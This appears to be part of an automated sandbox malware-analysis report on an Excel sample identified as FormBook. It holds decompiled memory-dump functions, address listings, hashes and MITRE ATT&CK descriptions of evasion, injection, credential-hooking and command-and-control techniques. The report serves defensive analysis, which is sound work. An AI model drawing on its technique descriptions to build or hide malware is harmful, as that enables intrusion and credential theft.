					_t40 = E027016C0(_t39);
				} else {
					_t40 = E026FF9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E02743915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E027001A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x27e793c; // 0x0
								_push(_t85);
								_t44 = E02701F28(_t71);
							} else {
								_t44 = E026FF8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E02743915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E02782306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E0272EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E02744FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E02753F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E02753F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x27e20c0;
								if(_t85 != 0x27e20c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E0278217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E02753F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

0x0272ec56
0x0272ec56
0x0272ec56
0x0272ec5c
0x0272ec64
0x027623e6
0x027623eb
0x027623eb
0x0272ec6a
0x0272ec6c
0x0272ec6f
0x027623f3
0x027623f8
0x027623fa
0x027623fc
0x0272ec75
0x0272ec76
0x0272ec76
0x0272ec7b
0x0272ec7c
0x0272ec7e
0x02762406
0x02762407
0x0276240c
0x0276240d
0x0276240d
0x0276240d
0x02762414
0x02762417
0x0276241e
0x02762435
0x02762438
0x0276243c
0x0276243f
0x02762442
0x02762443
0x02762446
0x02762449
0x02762453
0x02762455
0x0276245b
0x0276245b
0x0272eb99
0x0272eb99
0x0272eb9c
0x0272eb9d
0x0272eb9f
0x0272eba2
0x02762465
0x0276246b
0x0276246d
0x0272eba8
0x0272eba9
0x0272eba9
0x0272ebae
0x0272ebb3
0x0272ebb9
0x0272ebbb
0x02762513
0x02762514
0x02762519
0x0276251b
0x0272ec2a
0x0272ec2d
0x0272ec33
0x0272ec36
0x0272ec3a
0x0272ec3e
0x0272ec40
0x0272ec47
0x0272ec47
0x0272ec40
0x027022c6
0x0272ebc1
0x0272ebc1
0x0272ebc5
0x0272ec9a
0x0272ec9a
0x0272ebd6
0x0272ebd6
0x00000000
0x0272ebbb
0x02762477
0x0276247c
0x02762486
0x0276248b
0x02762496
0x0276249b
0x0276249d
0x027624a0
0x027624a3
0x027624aa
0x027624aa
0x027624a5
0x027624a5
0x027624a5
0x027624ac
0x027624af
0x027624b0
0x027624b3
0x027624b9
0x027624ba
0x027624bb
0x027624c6
0x027624cb
0x027624cd
0x027624d0
0x027624d1
0x027624d4
0x027624d6
0x027624d9
0x027624d9
0x027624dc
0x027624df
0x027624e1
0x027624e7
0x027624e9
0x027624ec
0x027624ef
0x027624f2
0x027624f2
0x027624ef
0x027624e7
0x027624fa
0x027624ff
0x02762501
0x02762503
0x02762506
0x0276250b
0x0272eb8c
0x0272eb93
0x00000000
0x00000000
0x0272eb93
0x00000000
0x0272eb99
0x0272ec85
0x0272ec85
0x0272ec85
0x00000000

Strings

RTL: Re-Waiting, xrefs: 027624FA
RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0276248D
RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 027624BD

Memory Dump Source

Source File: 0000000E.00000002.2377445124.00000000026F0000.00000040.00000001.sdmp, Offset: 026E0000, based on PE: true

Associated: 0000000E.00000002.2377438870.00000000026E0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377563820.00000000027D0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377571148.00000000027E0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377579086.00000000027E4000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377586568.00000000027E7000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377593252.00000000027F0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377641696.0000000002850000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
API String ID: 0-3177188983
Opcode ID: d1cacf850fb38f8c291477d272daa07c71b52d8a98e743bb0628a192a5895081
Instruction ID: 9cffeeb166d89f0925ee3158a735341d3651af7a56c029c274f1cb375bd7157c
Opcode Fuzzy Hash: d1cacf850fb38f8c291477d272daa07c71b52d8a98e743bb0628a192a5895081
Instruction Fuzzy Hash: 5541F670600214ABDB60EB68CC8CF7A7BE9EF44320F108615FD55AB6C1D770E945CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0273FCC9, Relevance: 6.3, APIs: 4, Instructions: 257
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0273FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E0273EE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E0273EE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E0273685D(_t167, 4) == 0) {
								if(E0273685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E0273685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E0273685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E02718980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E0270DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E0273EE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E0273EE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

0x0273fcd1
0x0273fcd6
0x0273fcd9
0x0273fcdc
0x0273fcdf
0x0273fce2
0x0273fce5
0x0273fce8
0x0273fceb
0x0273fced
0x0273fced
0x0273fcf3
0x00000000
0x00000000
0x0273fcfc
0x0273fcfe
0x0273fdc1
0x0276ecbd
0x00000000
0x0276eccc
0x0276eccc
0x0276ecd2
0x00000000
0x00000000
0x0276ecdf
0x0276ece0
0x0276ece4
0x0276eceb
0x0276ecee
0x0276eca8
0x0276eca8
0x0276ecaa
0x0273fd76
0x0273fd79
0x0273fdb4
0x0273fdb5
0x0273fdb6
0x00000000
0x0273fdb6
0x0273fd7e
0x0276ecfc
0x0273fe2f
0x00000000
0x0273fe2f
0x0276ed08
0x0276ed0f
0x0276ed17
0x0276ed1b
0x00000000
0x0276ed1b
0x0273fd88
0x00000000
0x00000000
0x0273fd94
0x0273fd99
0x0273fda1
0x00000000
0x00000000
0x0273fdb0
0x00000000
0x0273fdb0
0x0276ecbd
0x0273fdc7
0x0273fdcb
0x00000000
0x0273fdd7
0x0273fde3
0x0273fe06
0x02751fe7
0x00000000
0x00000000
0x02751fef
0x02751ff0
0x02751ff4
0x02751ff7
0x02751ffa
0x02751ffd
0x02752000
0x00000000
0x00000000
0x0276ecf1
0x00000000
0x0276ecf1
0x00000000
0x0273fe06
0x0273fde8
0x0273fdec
0x0273fdef
0x0273fdf2
0x00000000
0x0273fdf2
0x0273fdcb
0x0273fd04
0x0273fd05
0x0276ec67
0x00000000
0x00000000
0x0276ec6f
0x00000000
0x0276ec6f
0x0273fd13
0x0273fd3c
0x0273fd40
0x0276ec75
0x0276ec7a
0x00000000
0x0276ec8a
0x0276ec8a
0x0276ec90
0x0276ecb2
0x0273fd73
0x0273fd73
0x00000000
0x0273fd73
0x0276ec95
0x00000000
0x00000000
0x0276eca1
0x0276eca4
0x0276eca5
0x00000000
0x0276eca5
0x0276ec7a
0x0273fd4a
0x00000000
0x0273fd6e
0x0273fd6e
0x0273fd71
0x00000000
0x0273fd71
0x0273fd4a
0x0273fd21
0x0274a3a1
0x00000000
0x0274a3a1
0x0273fd36
0x0275200b
0x02752012
0x00000000
0x00000000
0x02752018
0x00000000
0x02752018
0x00000000
0x0273fd36
0x0273fe0f
0x0273fe16
0x0274a3ad
0x00000000
0x00000000
0x0274a3b3
0x0274a3b3
0x0273fe1f
0x0276ed25
0x0276ed86
0x00000000
0x00000000
0x0276ed91
0x0276ed95
0x0276ed95
0x0276ed9a
0x0276edad
0x0276edb3
0x0276edba
0x0276edc4
0x0276edc9
0x00000000
0x0276edcc
0x0276ed2a
0x0276ed55
0x00000000
0x00000000
0x0276ed61
0x0276ed66
0x0276ed6e
0x00000000
0x00000000
0x0276ed7d
0x00000000
0x0276ed7d
0x0276ed30
0x00000000
0x00000000
0x0276ed3c
0x0276ed43
0x0276ed4b
0x00000000
0x00000000
0x00000000
0x00000000

APIs

__fassign.LIBCMT ref: 0273FD94

Memory Dump Source

Source File: 0000000E.00000002.2377445124.00000000026F0000.00000040.00000001.sdmp, Offset: 026E0000, based on PE: true

Associated: 0000000E.00000002.2377438870.00000000026E0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377563820.00000000027D0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377571148.00000000027E0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377579086.00000000027E4000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377586568.00000000027E7000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377593252.00000000027F0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377641696.0000000002850000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID:
API String ID: 3965848254-0
Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction ID: 66bf615fa42207180f307eb887caafd2c552072f98e7f78f46a0311da681bb10
Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction Fuzzy Hash: EB91BF71D0021AEFDF26DF9AC848BEEB7F5EF45348F20806AD805A7552E7304A41CB92

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Doc7656.xlsx

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "Doc7656.xlsx"

Indicators

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64

General

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112

General

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200

General

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre